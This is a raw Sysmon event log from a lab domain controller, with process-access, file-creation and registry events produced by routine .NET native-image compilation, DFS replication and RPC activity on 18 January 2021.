10341000x80000000000000007496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.527{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:22.527{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:22.058{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91E2-6005-3703-00000000A301}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.043{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91E2-6005-3703-00000000A301}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:22.043{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91E2-6005-3703-00000000A301}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:29.558{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91E9-6005-3903-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:29.542{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91E9-6005-3903-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:29.542{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91E9-6005-3903-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:29.214{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12c4-0\PresentationCore.dll2021-01-18 13:49:29.214 10341000x80000000000000007507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:30.402{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:30.386{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:30.386{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x80000000000000007504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:30.214{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000007503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:49:30.214{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000007502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:30.214{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x80000000000000007527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:39.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:39.745{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
